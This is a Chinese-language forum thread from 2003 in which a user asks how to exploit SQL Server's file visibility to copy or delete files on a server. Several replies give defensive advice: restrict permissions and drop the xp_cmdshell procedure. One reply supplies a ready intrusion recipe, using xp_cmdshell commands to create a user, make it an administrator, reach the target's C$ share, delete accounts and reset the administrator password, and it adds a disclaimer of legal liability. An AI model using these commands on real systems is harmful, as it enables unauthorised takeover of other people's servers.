社区
MS-SQL Server
帖子详情
怎么样利用sqlserver的漏洞?
smilegw
2003-12-09 11:12:11
不知道大家发现了没有,sqlserver装在服务器上,我们在客户端注册到服务器上,如果要用企业管理器备份服务器上的数据时,便会看到服务器上所有的盘符和所有的文件!!我们怎么能利用这个漏洞对服务器上的文件进行操作呢,比如说考拷贝,或删除呢?
...全文
77
7
打赏
收藏
怎么样利用sqlserver的漏洞?
不知道大家发现了没有,sqlserver装在服务器上,我们在客户端注册到服务器上,如果要用企业管理器备份服务器上的数据时,便会看到服务器上所有的盘符和所有的文件!!我们怎么能利用这个漏洞对服务器上的文件进行操作呢,比如说考拷贝,或删除呢?
复制链接
扫一扫
分享
转发到动态
举报
AI
作业
写回复
配置赞助广告
用AI写文章
7 条
回复
切换为时间正序
请发表友善的回复…
发表回复
打赏红包
zjcxc
元老
2003-12-09
打赏
举报
回复
利用的话,就调用xp_cmdshell.但也要有管理员管理.
w_rose
2003-12-09
打赏
举报
回复
谁让你允许任何人都能够有sa/dbo身份的?
大部分人(超过80%),对安全性问题基本上无知无畏。少部分人(超过15%),包括我,只有很少一点知识和经验。其实根本不用“删除xp_cmdshell”或者“过滤用户命令”等临时应付的办法,好好规范每一个访客的操作范围就行了。
w_rose
2003-12-09
打赏
举报
回复
谁允许你开发服务器上的磁盘目录访问权限的?
zjcxc
元老
2003-12-09
打赏
举报
回复
通过权限限制就行了.
lynx1111
2003-12-09
打赏
举报
回复
楼上说的只有SA级别权限的才能使用xp_cmdshell
如果你不需要扩展存储过程xp_cmdshell请把它去掉。使用这个SQL语句:
use master
sp_dropextendedproc 'xp_cmdshell'
xp_cmdshell是进入操作系统的最佳捷径,是数据库留给操作系统的一个大后门。如果你需要这个存储过程,请用这个语句也可以恢复过来。
sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
Arionma
2003-12-09
打赏
举报
回复
这需要管理员权限。
txlicenhe
2003-12-09
打赏
举报
回复
http://expert.csdn.net/Expert/topic/2343/2343814.xml?temp=.7005121
本地装个sqlserver,用查询分析器登陆对方后:
exec xp_cmdshell 'net user mm 123 /add' --添加一用户
exec xp_cmdshell 'net localgroup administrators mm /add' --为用户添加管理员权限
再用\\对方机器\c$入侵
最后用 exec xp_cmdshell 'net user admin /delete'把用户给删除掉
改密码:
xp_cmdshell 'net user administrator "123"'
若引起法律责任,概不负责。
啊D注入工具无限制版
【啊D注入工具无限制版】是一款在网络安全领域中广泛使用的数据库
漏洞
检测工具,主要用于测试Web应用程序中的SQL注入
漏洞
。SQL注入是一种常见的攻击手法,通过输入恶意SQL代码,攻击者可以获取、修改、删除数据库中...
SQLServer
数据库
漏洞
SQLServer
数据库
漏洞
SQL Server
漏洞
评估工具
今天突然发现SQL Server的新特性,
漏洞
评估。数据库是所有业务系统的核心,数据的暴露和安全是大家最为关心的问题,如何确定自己的数据是否安全。 作为DBA来说凭经验来完成是很难的。况且大多数企业还没有...
拿到一个网站,怎么判断该网站是否存在sql注入
漏洞
?
漏洞
挖掘
漏洞
利用
修复
漏洞
sql注入
漏洞
、文件操作
漏洞
、xss、rce、逻辑
漏洞
反序列化、、、、 sql注入
漏洞
: 网站的数据库 脱裤 拖取网站数据库 数据库基础: 数据库基本结构:数据库 -- 数据表 -- 数据列 --...
SQL Server 安全
漏洞
评估工具
为避免SQL Server遭受攻击,组织必须不断评估数据库系统来确定是否存在
漏洞
。这是一种有效的主动防御方法,用于分析数据库中的潜在
漏洞
及其与标准设置的偏差,如太大的权限、敏感数据的暴露、错误配置等。这也是满足...
MS-SQL Server
34,838
社区成员
254,632
社区内容
发帖
与我相关
我的任务
MS-SQL Server
MS-SQL Server相关内容讨论专区
复制链接
扫一扫
分享
社区描述
MS-SQL Server相关内容讨论专区
社区管理员
加入社区
获取链接或二维码
近7日
近30日
至今
加载中
查看更多榜单
社区公告
暂无公告
试试用AI创作助手写篇文章吧
+ 用AI写文章